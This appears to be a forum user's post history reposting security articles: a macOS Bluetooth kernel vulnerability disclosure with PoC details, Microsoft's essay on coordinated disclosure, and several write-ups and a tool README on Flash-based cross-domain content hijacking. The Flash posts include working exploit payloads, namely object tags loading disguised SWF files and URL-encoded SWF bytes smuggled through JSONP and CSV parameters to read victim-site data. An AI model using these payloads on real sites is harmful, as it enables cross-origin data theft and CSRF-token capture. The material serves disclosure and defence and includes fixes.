Everything posted by Nytro
Analyzing Man-in-the-Browser (MITB) Attacks

The Matrix is real and living inside your browser. How, you ask? In the form of malware targeting your financial institutions. The malware does not have to attack the institution itself; it only has to compromise your web browser. By changing what you see in the browser, attackers can steal any information you enter and display whatever they choose. This has become known as the Man-in-the-Browser (MITB) attack.

Download: https://www.sans.org/reading-room/whitepapers/forensics/analyzing-man-in-the-browser-mitb-attacks-35687
-
(This post is a joint work with @joystick, see also his blog here)

Motivated by our previous findings, we performed some more tests on the service IOBluetoothHCIController of the latest version of Mac OS X (Yosemite 10.10.1), and we found five additional security issues. The issues have been reported to Apple Security and, since the deadline we agreed upon with them has expired, we now disclose details and PoCs for four of them (the last one was reported a few days later and is still under investigation by Apple). All the issues are in class IOBluetoothHCIController, implemented in the IOBluetoothFamily kext (md5 e4123caff1b90b81d52d43f9c47fec8f).

[h=3]Issue 1 (crash-issue1.c)[/h]

Many callback routines handled by IOBluetoothHCIController blindly dereference pointer arguments without checking them. The caller of these callbacks, IOBluetoothHCIUserClient::SimpleDispatchWL(), may actually pass NULL pointers, which are eventually dereferenced. More precisely, every user-space argument handled by SimpleDispatchWL() consists of a value and a size field (see crash-issue1.c for details). When a user-space client provides an argument with a NULL value but a large size, a subsequent call to IOMalloc(size) fails, returning a NULL pointer that is eventually passed on to callees, causing the NULL pointer dereference.

The PoC we provide targets method DispatchHCICreateConnection(), but the very same approach can be used to cause a kernel crash through other callback routines (basically any other callback that receives one or more pointer arguments). At first, we ruled out this issue as a mere local DoS. However, as discussed here, Yosemite only partially prevents mapping the NULL page from user space, so it is still possible to exploit NULL pointer dereferences to mount LPE attacks.
For instance, the following code can be used to map page zero:

Mac:tmp $ cat zeropage.c
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/vm_map.h>
#include <stdio.h>

int main(int argc, char **argv) {
    mach_vm_address_t addr = 0;
    vm_deallocate(mach_task_self(), 0x0, 0x1000);
    int r = mach_vm_allocate(mach_task_self(), &addr, 0x1000, 0);
    printf("%08llx %d\n", addr, r);
    *((uint32_t *)addr) = 0x41414141;
    printf("%08x\n", *((uint32_t *)addr));
}
Mac:tmp $ llvm-gcc -Wall -o zeropage{,.c} -Wl,-pagezero_size,0 -m32
Mac:tmp $ ./zeropage
00000000 0
41414141
Mac:tmp $

Trying the same without the -m32 flag results in the 64-bit Mach-O being blocked at load time by the OS with the message "Cannot enforce a hard page-zero for ./zeropage" (unless you do it as "root", but then what's the point?).

[h=3]Issue 2 (crash-issue2.c)[/h]

As shown in the screenshot below, IOBluetoothHCIController::BluetoothHCIChangeLocalName() is affected by an "old-school" stack-based buffer overflow, due to a bcopy(src, dest, strlen(src)) call where src is fully controlled by the attacker. To the best of our knowledge, this bug cannot be directly exploited due to the existing stack canary protection. However, it may still be useful to mount an LPE attack if used in conjunction with a memory leak vulnerability, leveraged to disclose the canary value.

[Screenshot: Issue 2, a plain stack-based buffer overflow]

[h=3]Issue 3 (crash-issue3.c)[/h]

IOBluetoothHCIController::TransferACLPacketToHW() receives as an input parameter a pointer to an IOMemoryDescriptor object. The function carefully checks that the supplied pointer is non-NULL; however, regardless of the outcome of this test, it then dereferences the pointer (see the figure below; the attacker-controlled input parameter is stored in register r15).
The IOMemoryDescriptor object is created by the caller (DispatchHCISendRawACLData()) using the IOMemoryDescriptor::withAddress() constructor. As this constructor is provided with a user-controlled value, it may fail and return a NULL pointer. See the discussion of Issue 1 regarding the exploitability of NULL pointer dereferences on Yosemite.

[Screenshot: Issue 3, the module checks if r15 is NULL, but dereferences it anyway]

[h=3]Issue 4 (lpe-issue1.c)[/h]

In this case, the problem is due to a missing sanity check on the arguments of the following function:

IOReturn BluetoothHCIWriteStoredLinkKey(
    uint32_t req_index,
    uint32_t num_of_keys,
    BluetoothDeviceAddress *p_device_addresses,
    BluetoothKey *p_bluetooth_keys,
    BluetoothHCINumLinkKeysToWrite *outNumKeysWritten);

The first parameter, req_index, is used to find an HCI request in the queue of allocated HCI requests (thus this exploit first requires filling this queue with possibly fake requests). The second integer parameter (num_of_keys) is used to calculate the total size of the other inputs, respectively pointed to by p_device_addresses and p_bluetooth_keys.
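This unchecked size calculation is the crux of the bug. A conceptual Python sketch of the missing check (this is a model, not the kernel code; the destination buffer size below is hypothetical, while the 6-byte size of a Bluetooth device address is standard):

```python
# Model of the Issue 4 overflow: size_of_addresses is derived purely from
# the attacker-supplied num_of_keys and is never compared against the
# size of outResultBuf before the copy takes place.

DEVICE_ADDRESS_SIZE = 6     # a Bluetooth device address is 6 bytes
OUT_RESULT_BUF_SIZE = 64    # hypothetical fixed-size destination buffer

def copy_overflows(num_of_keys):
    """True if the computed copy length would overrun the destination."""
    size_of_addresses = num_of_keys * DEVICE_ADDRESS_SIZE
    return size_of_addresses > OUT_RESULT_BUF_SIZE
```

A sane implementation would reject the request whenever this predicate is true, instead of passing the computed size straight to the formatted-copy routine.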
As shown in the screenshot below, these values are not checked before being passed to function IOBluetoothHCIController::SendHCIRequestFormatted(), which has the following prototype:

IOReturn SendHCIRequestFormatted(uint32_t req_index, uint16_t inOpCode,
    uint64_t outResultsSize, void *outResultBuf,
    const char *inFormat, ...);

[Screenshot: Issue 4, an exploitable buffer overflow]

The passed format string "HbbNN" will eventually cause size_of_addresses bytes to be copied from p_device_addresses to outResultBuf in reverse order (the 'N' format consumes two arguments: the first is a size, the second a pointer to read from). If the calculated size_of_addresses is big enough (i.e., if we provide a big enough num_of_keys parameter), the copy overflows outResultBuf, trashing everything above it, including a number of function pointers in the vtable of an HCI request object. These pointers are overwritten with attacker-controlled data (i.e., the data pointed to by p_bluetooth_keys) and called before returning to user space, so we can divert execution wherever we want.

As a PoC, lpe-issue1.c exploits this bug and attempts to call a function located at the attacker-controlled address 0x4141414142424242. Please note that the attached PoC requires some more tuning before it can cleanly return to user space, since more than one vtable pointer is corrupted during the overflow and needs to be fixed with valid pointers.

[Screenshot: execution of our "proof-of-concept" exploit (Issue 4)]

[h=3]Notes[/h]

The PoCs we provide in this post are not "weaponized", i.e., they do not contain a real payload, nor do they attempt to bypass existing security features of Yosemite (e.g., kASLR and SMEP).
If you're interested in bypass techniques (as you probably are, if you made it here), Ian Beer of Google Project Zero covered pretty much all of them in a very thorough blog post. In his case, he used a leak in the IOKit registry to calculate the kernel slide and defeat kASLR, while he used an in-kernel ROP chain to bypass SMEP. More recently, @i0n1c posted here about how kASLR is fundamentally broken on Mac OS X at the moment.

[h=3]Conclusions[/h]

Along with the last issue identified, we shared with Apple our conclusions on this kext: based on the issues we identified, we speculate there are many other crashes and LPE vulnerabilities in it. Ours, however, is just a best-effort analysis done in our spare time, and given the very small effort it took us to identify the vulnerabilities, we would suggest a serious security evaluation of the whole kext's code.

[h=3]Disclosure timeline[/h]

02/11: Notification of issues 1, 2 and 3.
23/11: No answer received from Apple; notification of issue 4. As no answer had been received since the first contact, we proposed December 2 as a possible disclosure date.
25/11: Apple answers, requesting more time. We propose to move the disclosure date to January 12.
27/11: Apple accepts the new deadline.
05/12: Contact Apple asking for the status of the vulnerabilities.
06/12: Apple says they're still "investigating the issue".
23/12: Notification of a new issue (#5), proposing January 23 as a tentative disclosure date.
06/01: Apple asks for more time for issue #5. We propose to move the disclosure date to February 23. We restate our intention to disclose the 4 previous issues on January 12.
12/01: No answer from Apple; disclosing the first 4 issues.

Sursa: Roberto Paleari's blog: Time to fill OS X (Blue)tooth: Local privilege escalation vulnerabilities in Yosemite
-
A Call for Better Coordinated Vulnerability Disclosure
Chris Betz, 11 Jan 2015 6:49 PM

For years our customers have been in the trenches against cyberattacks in an increasingly complex digital landscape. We've been there with you, as have others. And we aren't going anywhere. Forces often seek to undermine and disrupt technology and people, attempting to weaken the very devices and services people have come to depend on and trust. Just as malicious acts are planned, so too are counter-measures implemented by companies like Microsoft. These efforts aim to protect everyone against a broad spectrum of activity, ranging from phishing scams that rely on socially engineered trickery to sophisticated attacks by persistent and determined adversaries. (And yes, people have a role to play: strong passwords, good policies and practices, keeping current to the best of your ability, detection and response, etc. But we'll save those topics for another day.)

With all that is going on, this is a time for security researchers and software companies to come together, not stand divided, over important protection strategies such as the disclosure of vulnerabilities and their remediation. In terms of the software industry at large and each player's responsibility, we believe in Coordinated Vulnerability Disclosure (CVD). This is a topic the security technology profession has debated for years. Ultimately, vulnerability collaboration between researchers and vendors is about limiting the field of opportunity so customers and their data are better protected against cyberattacks.

Those in favor of full, public disclosure believe that this method pushes software vendors to fix vulnerabilities more quickly and makes customers develop and take actions to protect themselves. We disagree. Releasing information absent context or a stated path to further protections unduly pressures an already complicated technical environment.
It is necessary to fully assess the potential vulnerability, design and evaluate against the broader threat landscape, and issue a "fix" before it is disclosed to the public, including to those who would use the vulnerability to orchestrate an attack. We are in this latter camp.

CVD philosophy and action is playing out today as one company, Google, has released information about a vulnerability in a Microsoft product two days before our planned fix on our well-known and coordinated Patch Tuesday cadence, despite our request that they avoid doing so. Specifically, we asked Google to work with us to protect customers by withholding details until Tuesday, January 13, when we will be releasing a fix. Although following through keeps to Google's announced timeline for disclosure, the decision feels less like principles and more like a "gotcha", with customers the ones who may suffer as a result. What's right for Google is not always right for customers. We urge Google to make protection of customers our collective primary goal.

Microsoft has long believed coordinated disclosure is the right approach and minimizes risk to customers. We believe those who fully disclose a vulnerability before a fix is broadly available are doing a disservice to millions of people and the systems they depend upon. Other companies and individuals believe that full disclosure is necessary because it forces customers to defend themselves, even though the vast majority take no action, being largely reliant on a software provider to release a security update. Even for those able to take preparatory steps, risk is significantly increased by publicly announcing information that a cybercriminal could use to orchestrate an attack, and this assumes that those who would take action are made aware of the issue.
Of the vulnerabilities privately disclosed through coordinated disclosure practices and fixed each year by all software vendors, we have found that almost none are exploited before a "fix" has been provided to customers, and even after a "fix" is made publicly available only a very small number are ever exploited. Conversely, the track record of vulnerabilities publicly disclosed before fixes are available for affected products is far worse, with cybercriminals more frequently orchestrating attacks against those who have not or cannot protect themselves.

Another aspect of the CVD debate has to do with timing, specifically the amount of time that is acceptable before a researcher broadly communicates the existence of a vulnerability. Opinion on this point varies widely. Our approach, and one that we have advocated others adopt, is that researchers work with the vendor to deliver an update that protects customers prior to releasing details of the vulnerability. There are certainly cases where lack of response from a vendor challenges that plan, but still the focus should be on protecting customers. You can see our values in action through our own security experts, who find and report vulnerabilities in many companies' products, some of which we receive credit for, and many that go unrecognized publicly. We don't believe it would be right to have our security researchers find vulnerabilities in competitors' products, apply pressure that a fix should take place in a certain timeframe, and then publicly disclose information that could be used to exploit the vulnerability and attack customers before a fix is created.

Responding to security vulnerabilities can be a complex, extensive and time-consuming process. As a software vendor this is an area in which we have years of experience.
Some of the complexity in the timing discussion is rooted in the variety of environments that we as security professionals must consider: real-world impact in customer environments, the number of supported platforms the issue exists in, and the complexity of the fix. Vulnerabilities are not all made equal, nor measured by a well-defined standard. And an update to an online service can have different complexity and dependencies than a fix to a software product, to a decade-old software platform on which tens of thousands have built applications, or to hardware devices. Thoughtful collaboration takes these attributes into account.

To arrive at a place where important security strategies protect customers, we must work together. We appreciate and recognize the positive collaboration, information sharing and results-orientation underway with many security players today. We ask that researchers privately disclose vulnerabilities to software providers, working with them until a fix is made available before sharing any details publicly. It is in that partnership that customers benefit the most. Policies and approaches that limit or ignore that partnership do not benefit the researchers, the software vendors, or our customers. It is a zero-sum game where all parties end up injured.

Let's face it, no software is perfect. It is, after all, made by human beings. Microsoft has a responsibility to work in our customers' best interest to address security concerns quickly, comprehensively, and in a manner that continues to enable the vast ecosystem that provides technology to positively impact people's lives. Software is organic; usage patterns and practices change, and new systems are built on top of products that test (and in some cases exceed) the limits of their original design. In many ways that's the exciting part of software within the rapidly evolving world we live in. Stating these points isn't in any way an abdication of responsibility.
It is our job to build the best possible software that we can, and to protect it continuously to the very best of our ability. We're all in.

Chris Betz
Senior Director, MSRC
Trustworthy Computing

[Note: In our own CVD policy (available at microsoft.com/cvd), we do mention exceptions for cases in which we might release an advisory about a vulnerability in a third party's software before an update is ready, including when the technical details have become publicly known, when there is evidence of exploitation of an unpatched vulnerability, and when the vendor fails to respond to requests for discussion.]

Sursa: A Call for Better Coordinated Vulnerability Disclosure - MSRC - Site Home - TechNet Blogs
-
The pitfalls of allowing file uploads on your website

These days a lot of websites allow users to upload files, but many don't know about the pitfalls of letting users (potential attackers) upload files, even valid files.

What's a valid file? Usually, a restriction would be placed on two parameters:

The uploaded file extension
The uploaded Content-Type

For example, the web application could check that the extension is "jpg" and the Content-Type "image/jpeg" to make sure it's impossible to upload malicious files. Right?

The problem is that plugins like Flash don't care about extension and Content-Type. If a file is embedded using an <object> tag, it will be executed as a Flash file as long as the content of the file looks like a valid Flash file.

But wait a minute! Shouldn't the Flash be executed within the domain that embeds the file using the <object> tag? Yes and no. If a Flash file (bogus image file) is uploaded on victim.com and then embedded at attacker.com, the Flash file can execute JavaScript within the domain of attacker.com. However, if the Flash file sends requests, it will be allowed to read files within the domain of victim.com. This basically means that if a website allows file uploads without validating the content of the file, an attacker can bypass any CSRF protection on the website.
The attack

Based on these facts we can create an attack scenario like this:

An attacker creates a malicious Flash (SWF) file
The attacker changes the file extension to JPG
The attacker uploads the file to victim.com
The attacker embeds the file on attacker.com using an <object> tag with type "application/x-shockwave-flash"
The victim visits attacker.com, which loads the file embedded with the <object> tag
The attacker can now send and receive arbitrary requests to victim.com using the victim's session
The attacker sends a request to victim.com and extracts the CSRF token from the response

A payload could look like this:

<object style="height:1px;width:1px;" data="http://victim.com/user/2292/profilepicture.jpg" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=read&u=http://victim.com/secret_file.txt"></object>

The fix

The good news is that there's a fairly easy way to prevent Flash from doing this. Flash won't execute the file if it is served with a Content-Disposition header like so:

Content-Disposition: attachment; filename="image.jpg"

So if you allow file uploads or print arbitrary user data in your service, you should always verify the contents as well as send a Content-Disposition header where applicable. Another way to remediate issues like this is to host the uploaded files on a separate domain (like websiteusercontent.com).

Other uses

But the fun doesn't stop at file uploads! Since the only requirement of this attack is that an attacker can control the data at a location on the target domain (regardless of Content-Type), there's more than one way to perform it. One way would be to abuse a JSONP API. Usually, the attacker can control the output of a JSONP API endpoint by changing the callback parameter. However, if an attacker uses an entire Flash file as the callback, we can use it just like we would use an uploaded file in this attack.
A payload could look like this:

<object style="height:1px;width:1px;" data="http://victim.com/user/jsonp?callback=CWS%07%0E000x%9C%3D%8D1N%C3%40%10E%DF%AE%8D%BDI%08%29%D3%40%1D%A0%A2%05%09%11%89HiP%22%05D%8BF%8E%0BG%26%1B%D9%8E%117%A0%A2%DC%82%8A%1Br%04X%3B%21S%8C%FE%CC%9B%F9%FF%AA%CB7Jq%AF%7F%ED%F2%2E%F8%01%3E%9E%18p%C9c%9Al%8B%ACzG%F2%DC%BEM%EC%ABdkj%1E%AC%2C%9F%A5%28%B1%EB%89T%C2Jj%29%93%22%DBT7%24%9C%8FH%CBD6%29%A3%0Bx%29%AC%AD%D8%92%FB%1F%5C%07C%AC%7C%80Q%A7Nc%F4b%E8%FA%98%20b%5F%26%1C%9F5%20h%F1%D1g%0F%14%C1%0A%5Ds%8D%8B0Q%A8L%3C%9B6%D4L%BD%5F%A8w%7E%9D%5B%17%F3%2F%5B%DCm%7B%EF%CB%EF%E6%8D%3An%2D%FB%B3%C3%DD%2E%E3d1d%EC%C7%3F6%CD0%09" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=alert&u=http://victim.com/secret_file.txt"></object>

tl;dr: Send Content-Disposition headers for uploaded files and validate your JSONP callback names. Or put the uploaded files on a separate domain.

And as always, if you want to know if your website has issues like these, try a Detectify scan! That's it for now.

Written by: Mathias, Frans

Sursa: Detectify Blog – The pitfalls of allowing file uploads on your...
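Both tl;dr recommendations above can be sketched in a few lines (a minimal, framework-agnostic sketch; the function names, the octet-stream default, and the exact callback regex are my own choices, not from the post):

```python
import re

# 1) Serve uploaded files with Content-Disposition: attachment so the
#    Flash Player refuses to execute them in the browser.
def headers_for_upload(filename):
    return {
        "Content-Type": "application/octet-stream",  # ignore the uploader's declared type
        "Content-Disposition": 'attachment; filename="%s"' % filename,
        "X-Content-Type-Options": "nosniff",         # also stop browser content sniffing
    }

# 2) Validate JSONP callback names: identifier-style only (optionally
#    dotted), so a binary SWF body ("CWS" followed by control bytes)
#    can never be echoed back as the "callback".
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$.]{0,63}$")

def safe_jsonp_callback(name):
    return bool(CALLBACK_RE.match(name))
```

Note that "CWS" alone would pass the regex; what gets rejected is any real SWF payload, because its header is immediately followed by non-identifier bytes.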
-
Content-Type Blues

Assuming an attacker can control the start of a CSV file served up by a web application, what damage could be done? The example PHP code below serves up a basic CSV file, but allows the user to control the column names. Note that the Content-Type header is at least set properly.

<?php
header('Content-Type: text/csv');
header('Content-Disposition: inline; filename=blah.csv');
header('Content-Length: ' . 20);
echo $_GET["columnNames"] . "\r\n";
echo "1,2,3,4,5\r\n";
echo "data,we,do,not,control";
?>

Our first attempt might involve injecting in an XSS payload:

http://target/csvServe.php?columnNames=a,b,c,d,e<html><body><script>alert(1)</script></body></html>

This seems like a reasonable approach, since the application accepts and uses the columnNames parameter without performing any input validation or output encoding. But the browser, even our old friend IE, will not render the content as HTML due to the Content-Type header's value (text/csv). Note that this would be exploitable if the Content-Type header were set to text/plain instead, because IE will perform content sniffing in that situation.

Out of luck? Nope, just inject an entire SWF file into the columnNames parameter. A SWF's origin is the domain from which it was retrieved, similar to a Java applet (which uses IP addresses instead of domain names, though), therefore a malicious page could embed a SWF originating from the target's domain that could make arbitrary requests to the target domain and read the responses (steal sensitive data, defeat CSRF protections, and other generally nasty actions). But what about the data in the CSV that we don't control? The Flash Player will ignore the content following a well-formed SWF and execute the SWF properly. The following JavaScript code snippet demonstrates this technique.
Since both browsers and HTTP servers impose limits on the length of URLs, I would recommend writing the payload in ActionScript 2 using a command-line compiler like MTASC or an assembler like Flasm in order to craft a small SWF. Sadly, Flex is bloated, so mxmlc is not an option.

<script>
var flashvars = {};
var params = {};
var attributes = {};
var url = "http://target/csvServe.php?columnNames=CWS%07%AA%01%00%00x%DADP%C1N%021%14%9C%ED%22-j0%21%24%EB%81%03z%E3%E2%1F%18XI%88%1E%607%C0%C1%8B%D9%ACP%91X%ECf%A9%01%BF%40N%1C%F7%E6%DD%CF%F1%8F%F0%B7%05%FF%05%82%0Chz%E8%B3%03U%AD%0A%AA%D8%23%E8%D6%9B%84%D4%C5I%12%A7%B3%B7t%21%D77%D3%0F%A3q%A8_%DA%0B%F1%EE%09gpJ%B2P%FA9U0%2FHr%AD%0Df%B9L%8D%9C%CA%AD%19%2C%A5%9A%C3P%87%7B%A9%94not%AE%E6%ED%2Bd%B96%DA%7Cf%12%ABt%F9%8E4%CB%10N%26%D2%C4%B9%CE%06%2A%5D%ACQ0%08%B4%1A%8Do%86%1FG%BC%96%93%F6%C2%0E%C9%3A%08Q%5C%83%3F2%80%B7%7D%02%2B%FF%83%60%DC%A6%11%BE%7BU%19%07%F6%28%09%1B%15%15%88%13Q%8D%BE%28ID%84%28%1F%11%F1%82%92%88%FD%B9%0D%EFw%C0V34%8F%B3%145%88Zi%8E%5E%14%15%17%E0v%13%AC%E2q%DF%8A%A7%B7%01%BA%FE%1D%B5%BB%16%B9%0C%A7%E1%A4%9F%0C%C3%87%11%CC%EBr%5D%EE%CA%A5uv%F6%EF%E0%98%8B%97N%82%B9%F9%FCq%80%1E%D1%3F%00%00%00%FF%FF%03%00%84%26N%A8";
swfobject.embedSWF(url, "content", "400", "200", "10.0.0", "expressInstall.swf", flashvars, params, attributes);
</script>

Ideally, web applications wouldn't accept arbitrary content to build a CSV, but the Flash Player could also take steps to prevent this attack from occurring. The following improvements could be made, but would likely break some existing RIAs that fail to set the Content-Type header properly on their SWFs:

1) Refuse to play any SWF that does not have a correct MIME type (application/x-shockwave-flash).
2) Refuse to play any SWF that has erroneous data at the end of the file.

Moral of the story: setting the content type properly is not a substitute for proper input validation.

Sursa: Content-Type Blues | dead && end
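The input validation the moral of the story calls for can be sketched like this (a minimal example; the whitelist character set and the function name are my own choices, not from the post):

```python
import re

# Restrict attacker-supplied CSV column names to a conservative character
# set, so neither HTML nor a binary SWF ("CWS"/"FWS" header followed by
# compressed data) can be smuggled into the served file.
SAFE_COLUMN = re.compile(r"^[A-Za-z0-9 _-]{1,64}$")

def sanitize_column_names(raw):
    """Keep only whitelisted column names; silently drop the rest."""
    cols = [c.strip() for c in raw.split(",")]
    return ",".join(c for c in cols if SAFE_COLUMN.match(c))
```

A whitelist like this is preferable to trying to blacklist SWF or HTML signatures, since the attack only needs some reflected location on the target domain.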
-
Even uploading a JPG file can lead to Cross Domain Data Hijacking

Even uploading a JPG file can lead to Cross Domain Data Hijacking (a client-side attack)!

Introduction:

This post introduces a technique that has not been covered previously in other topics related to file upload attacks, such as Unrestricted file upload and File in the hole.

Update 1 (21/05/2014): It seems @fransrosen and @avlidienbrunn were quicker than me in publishing this technique! Yesterday they published a very good blog post about this issue: Detectify Blog – The pitfalls of allowing file uploads on your... I highly recommend readers to read the other blog post as well, especially for its nice JSONP trick. I wanted to wait until the end of this week to publish mine, but now that this technique is already published, I am releasing my post too. The draft version of this post and the PoCs were ready before, but I was not sure when I was going to publish it, as it would affect a lot of websites; this was a note for bug bounty hunters! The only point of this blog post now is the way that I had looked at the issue initially.

Update 2 (21/05/2014): Ok! People on Twitter were very resourceful and reminded me that this was not in fact a new technique, and some other bug bounty hunters are already using it in their advisories! I wish they had documented it properly before. The following links are related to this topic:

Content-Type Blues | dead && end (Content-Type Blues)
https://bounty.github.com/researchers/adob.html (Flash content-type sniffing)

How safe is the file uploader?

Imagine that there is a file uploader that properly validates the uploaded file's extension by using a white-list method. This file uploader only allows a few non-dangerous extensions such as .jpg, .png, and .txt. Moreover, it checks the filename so that it does not contain any non-alphanumeric characters!
This seems to be a simple and safe method to protect the server and its users, assuming the risks of file-processor bugs and file inclusion attacks have already been accepted. What can possibly go wrong?

This file uploader does not have any validation for the file's content, and therefore it is possible to upload a malicious file with a safe name and extension to the server. However, when the server is properly configured, this file cannot be run on the server. Moreover, the file will be sent to the client with an appropriate content-type such as text/plain or image/jpeg; as a result, an attacker cannot exploit a cross-site scripting issue by opening the uploaded file directly in the browser.

Enforcing the content-type by using an OBJECT tag!

If we could change the file's content-type for the browsers, we would be able to exploit this issue! But nowadays this is not directly possible, as it would count as a security issue for the browser... I knew straight away that the "OBJECT" tag has a "TYPE" attribute, but I was not sure which content-types would force the browser to actually load the object instead of showing its contents (the "OBJECT" tag can act as an IFrame). I created a test file (located at Object content-type test) that loads object tags with different mime-types, and the result is as follows (Java and Silverlight were not installed):

"application/futuresplash": loads the file as a Flash object
"application/x-shockwave-flash": loads the file as a Flash object
"text/x-component": only works in IE, to load .htc files(?)
"application/pdf" and a few others: load the file as a PDF object

The result can be different with different plugins installed. So I can load any uploaded file as a Flash file. Now I can upload a malicious Flash file onto the victim's server as a .JPG file, and then load it as a Flash file on my own website.
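A test page like the one described above can be generated with a short script (a sketch of the experiment, not the author's actual test file; the URL placeholder and function name are illustrative):

```python
# Build an HTML page that tries to load the same uploaded file through
# <object> tags with different "type" attributes, mirroring the
# mime-type experiment described above.

MIME_TYPES = [
    "application/futuresplash",
    "application/x-shockwave-flash",
    "text/x-component",
    "application/pdf",
]

def object_test_page(file_url):
    tags = "\n".join(
        '<object data="%s" type="%s" width="300" height="60"></object>'
        % (file_url, t)
        for t in MIME_TYPES
    )
    return "<html><body>\n%s\n</body></html>" % tags
```

Opening the generated page with different plugins installed shows which type attributes force the browser to hand the file to a plugin rather than render its contents.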
Please note that there is no point in uploading a Flash file that is vulnerable to XSS, as it would run under my website's domain instead of the target's.

Exploitation

I found out that the embedded Flash can still communicate with its source domain without checking the cross-domain policy. This makes sense, as the Flash file actually belongs to the victim's website. As a result, a Flash file that has been uploaded as a .JPG file to the victim's website can load important files of the victim's website using the current user's cookies; it can then send this information to JavaScript on the attacker's website, which has embedded this JPG file as a Flash file.

The exploitation is like a CSRF attack: you need to send a malicious link to a user who is already logged in to the victim's website (it still counts as CSRF even if you are not logged in, but that is out of the scope of this post). The malicious Flash file should already have been uploaded to the victim's website. If the uploader is vulnerable to a CSRF attack itself, an attacker can first upload a malicious Flash file and then use it to hijack the user's sensitive data or perform further CSRF attacks. As a result, an attacker can collect valuable information from the responses of different pages of the victim's website, such as users' data, CSRF tokens, etc.
The following demonstrates this issue:

A) 0me.me = attacker's website; sdl.me = victim's website
C) A JPG file that is actually a Flash file has already been uploaded to the victim's website: http://sdl.me/PoCs/CrossDomainDataHijack.jpg (the source code of this Flash file is accessible via the following link: http://0me.me/demo/SOP/CrossDomainDataHijack.as.txt)
D) There is a secret file in the victim's website (sdl.me) that we are going to read by using the attacker's website (0me.me): http://sdl.me/PoCs/secret.asp?mysecret=original
E) Note that the victim's website does not have any crossdomain.xml file: http://sdl.me/crossdomain.xml
F) Now an attacker sends the following malicious link to a user of sdl.me (the victim's website): Cross Domain Data Hijack

By pressing the "RUN" button, 0me.me (the attacker's website) can read the contents of the secret.asp file on sdl.me (the victim's website). This is just a demo file; the attack could be completely automated in a real scenario.

Note: If another website such as Soroush.me has added sdl.me as trusted in its crossdomain.xml file, the attacker's website can now also read the contents of Soroush.me by using this vulnerability.

Limitations

An attacker cannot read the cookies of the victim.com website.
An attacker cannot run JavaScript code directly by using this issue.

Future works

Other client-side technologies such as PDF, Java applets, and Silverlight might be used instead of the Flash technology. Bypassing the Flash security sandbox when a website uses "Content-Disposition: attachment;" could also be a research topic. If somebody bypasses this, many mail servers and file repositories will become vulnerable.

Recommendations

It is recommended to check the file's content to ensure it has the correct header and format. If possible, use a "Content-Disposition: attachment; filename=Filename.Extension;" header for files that do not need to be served in the web browser; Flash actually logs a security warning for this.
Isolating the domain of the uploaded files is also a good solution as long as the crossdomain.xml file of the main website does not include the isolated domain. Sursa: https://soroush.secproject.com/blog/2014/05/even-uploading-a-jpg-file-can-lead-to-cross-domain-data-hijacking-client-side-attack/
-
Cross-Site Content Hijacking (XSCH) PoC

License

Released under AGPL (see LICENSE for more information).

Description

This project can be used for:
- Exploiting websites with insecure policy files (crossdomain.xml or clientaccesspolicy.xml) by reading their contents.
- Exploiting insecure file upload functionalities which do not check the file contents properly, or which allow SWF or PDF files to be uploaded without a Content-Disposition header being sent during the download process. In this scenario, the crafted SWF, XAP, or PDF file should be uploaded with any extension, such as .JPG, to the target website. Then, the "Object File" value should be set to the URL of the uploaded file to read the target website's contents.

Note: .XAP files can be renamed to any other extension, but then they can no longer be loaded cross-domain. It seems Silverlight determines the file extension from the provided URL and ignores the file if the extension is not .XAP. This can still be exploited if a website allows users to use ";" or "/" after the actual file name to add a ".XAP" extension.

Usage

Exploiting an insecure policy file:
1) Host the ContentHijacking directory with a web server.
2) Browse to the ContentHijacking.html page.
3) Change the target in the HTML page to a suitable object from the "objects" directory ("xfa-manual-ContentHijacking.pdf" cannot be used).

Exploiting an insecure file upload/download:
1) Upload an object file from the "objects" directory to the victim server. These files can also be renamed with another extension when uploaded to another domain (for this purpose, first use Flash and then PDF, as Silverlight XAP files will not normally work with another extension from another domain).
2) Change the target in the HTML page to the location of the uploaded file.

Note: .XAP files can be renamed to any other extension, but then they can no longer be loaded cross-domain. It seems Silverlight determines the file extension from the provided URL and ignores it if it is not .XAP.
This can still be exploited if a website allows users to use ";" or "/" after the actual file name to add a ".XAP" extension.

Note: when Silverlight requests a .XAP file cross-domain, the content type must be: application/x-silverlight-app.
Note: PDF files can only be used in the Adobe Reader viewer (they will not work with the Chrome and Firefox built-in PDF viewers).

Usage example in IE with Adobe Reader:
https://15.rs/ContentHijacking/ContentHijacking.html?objFile=objects/ContentHijacking.pdf&objType=PDF&target=http://0me.me/&POSTData=Param1=Value1

Generic Recommendation to Solve the Security Issue

The file types allowed to be uploaded should be restricted to only those that are necessary for business functionality. The application should perform filtering and content checking on any files which are uploaded to the server. Files should be thoroughly scanned and validated before being made available to other users. If in doubt, the file should be discarded.

Adding a "Content-Disposition: attachment" header to static files will secure the website against Flash/PDF-based cross-site content hijacking attacks. It is recommended to perform this practice for all files that users need to download, in all modules that deal with a file download. Although this method does not secure the website against attacks using Silverlight or similar objects, it can mitigate the risk of using Adobe Flash and PDF objects, especially when uploading PDF files is permitted.

Flash/PDF (crossdomain.xml) or Silverlight (clientaccesspolicy.xml) cross-domain policy files should be removed if they are not in use and there is no business requirement for Flash or Silverlight applications to communicate with the website.

Cross-domain access should be restricted to a minimal set of domains that are trusted and will require access. An access policy is considered weak or insecure when a wildcard character is used, especially in the value of the "uri" attribute.
Any "crossdomain.xml" file which is used for Silverlight applications should be considered weak, as it can only accept a wildcard ("*") character in the domain attribute.

Browser caching should be disabled for the crossdomain.xml and clientaccesspolicy.xml files. This enables the website to easily update the file or restrict access to the Web services if necessary. Once the client access policy file is checked, it remains in effect for the browser session, so the impact of non-caching on the end-user is minimal. This can be raised as a low or informational risk issue based on the content of the target website and the security and complexity of the policy file(s).

Note: Using the "Referer" header cannot be a solution, as it is possible to set this header, for example by sending a POST request using Adobe Reader and PDF (see the "xfa-manual-ContentHijacking.pdf" file in the "objects" directory).

Project Page

See the project page for the latest update/help: https://github.com/nccgroup/CrossSiteContentHijacking

Author

Soroush Dalili (@irsdl) from NCC Group

References

- Even uploading a JPG file can lead to Cross Domain Data Hijacking (client-side attack)! https://soroush.secproject.com/blog/2014/05/even-uploading-a-jpg-file-can-lead-to-cross-domain-data-hijacking-client-side-attack/
- InsertScript: Multiple PDF Vulnerabilities - Text and Pictures on Steroids
- HTTP Communication and Security with Silverlight: http://msdn.microsoft.com/en-gb/library/cc838250(v=vs.95).aspx
